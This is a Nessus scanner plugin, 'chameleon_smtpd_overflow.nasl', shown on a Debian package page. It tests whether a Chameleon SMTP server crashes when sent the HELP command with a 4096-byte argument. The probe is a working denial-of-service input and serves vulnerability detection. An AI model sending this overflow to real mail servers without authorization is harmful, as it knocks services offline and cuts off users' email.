File: chameleon_smtpd_overflow.nasl

package info (click to toggle)
nessus-plugins 1.0.10-2
  • links: PTS
  • area: main
  • in suites: woody
  • size: 4,924 kB
  • ctags: 408
  • sloc: sh: 7,838; ansic: 3,415; makefile: 233
file content (93 lines) | stat: -rw-r--r-- 2,237 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
 
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10042);
 script_cve_id("CAN-1999-0261");
 name["english"] = "Chameleon SMTPd overflow";
 name["francais"] = "Chameleon SMTPd overflow";
 script_name(english:name["english"],
 	     francais:name["francais"]);
 
 desc["english"] = "It was possible to
crash the remote SMTP server by issuing
the HELP command followed by a too long
argument.

This problem may allow crackers to
prevent you from sending or receiving
e-mails, thus preventing you to
work properly.


Solution : Update your SMTP server.

Risk factor : Medium";


 desc["francais"] = "Il s'est avr
possible de planter le daemon SMTP 
distant en lui envoyant la commande
HELP suivie d'un argument trop long.

Un pirate peut utiliser ce problme 
pour vous empecher de recevoir
et d'envoyer des emails, vous
drangeant ainsi dans votre travail.

Solution : Mettez  jour votre server SMTP.

Facteur de risque : Moyen";


 script_description(english:desc["english"],
 		    francais:desc["francais"]);
 
 summary["english"] = "Determines if smtpd can be crashed"; 
 summary["francais"] = "Fait planter smtpd";
 script_summary(english:summary["english"],
 		francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 
 family["english"] = "Denial of Service"; 
 family["francais"] = "Dni de service";
 
 script_family(english:family["english"],
 	       francais:family["francais"]);
 script_dependencie("find_service.nes", "sendmail_expn.nasl");
 script_exclude_keys("Sendmail/fake");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

fake = get_kb_item("Sendmail/fake");
if(fake)exit(0);

port = get_kb_item("Services/smtp");
if(!port)port = 25;

if(get_port_state(port))soc = open_sock_tcp(port);
else exit(0);
if(soc)
{
 b = recv_line(socket:soc, length:1024);
 c = string("HELP ", crap(4096), "\r\n");
 send(socket:soc, data:c);
 close(soc);
 soc2 = open_sock_tcp(port);
 if(!soc2)security_hole(port);
 else close(soc2);
}